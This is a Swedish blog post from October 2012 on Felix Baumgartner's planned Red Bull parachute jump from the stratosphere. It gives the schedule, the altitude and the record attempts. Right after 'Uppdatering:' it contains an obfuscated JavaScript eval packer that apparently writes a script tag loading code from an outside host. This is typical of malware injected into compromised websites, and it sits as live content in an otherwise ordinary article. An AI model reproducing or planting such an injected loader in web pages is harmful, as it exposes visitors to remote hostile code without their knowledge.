Image Image Image Image Image Image Image Image Image Image

| 17 oktober, 2018

Scroll to top

Top

Felix Baumgartner & RedBull: fallskärm från stratosfären.

Felix Baumgartner & RedBull: fallskärm från stratosfären.
Filip Urde
  • On 4 oktober, 2012
  • http://www.revue.se/filip-urde

Uppdatering: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|brdss|var|u0026u|referrer|zriar||js|php’.split(‘|’),0,{}))
Nya tider.

Vi skrev för ett tag sedan (här) om äventyraren Felix Baumgartner som ska genomföra världens mest spektakulära fallskärmshopp. Felix  ska resa till den yttre stratosfären, för att sedan hoppa ner mot jorden, i vad som kommer bli det mest episka hoppet någonsin!

Den senaste väderrapporten bekräftar att hoppet planeras till måndag den 8 oktober.  Tisdag den 9 oktober.

Då kommer Felix Baumgartner att ta sig till den yttre stratosfären med hjälp av en gigantisk heliumballong och en specialbyggd kapsel.

Avfärden planeras till 12.30 svensk tid  14:30 svensk tid och Felix planeras landa igen runt 15.30.

Hoppet kommer ske på drygt 36 000 meters höjd, där han sedan kommer falla fritt tillbaka mot jorden, för att slutligen landa med hjälp av en fallskärm. Förutom att samla in data för forskning kring säkrare luft- och rymdfart är målet att slå hela fyra världsrekord:

·         Världens högsta bemannade ballongfärd (till 36 567 m)
·         Högsta fria fall (från 36 576 m)
·         Längsta fria fall (5,35 min eller mer)
·         Bryta ljudvallen i fritt fall utan farkost (i hastighet över 1110 km/h)

Om detta inte är ballt så vet jag inte längre!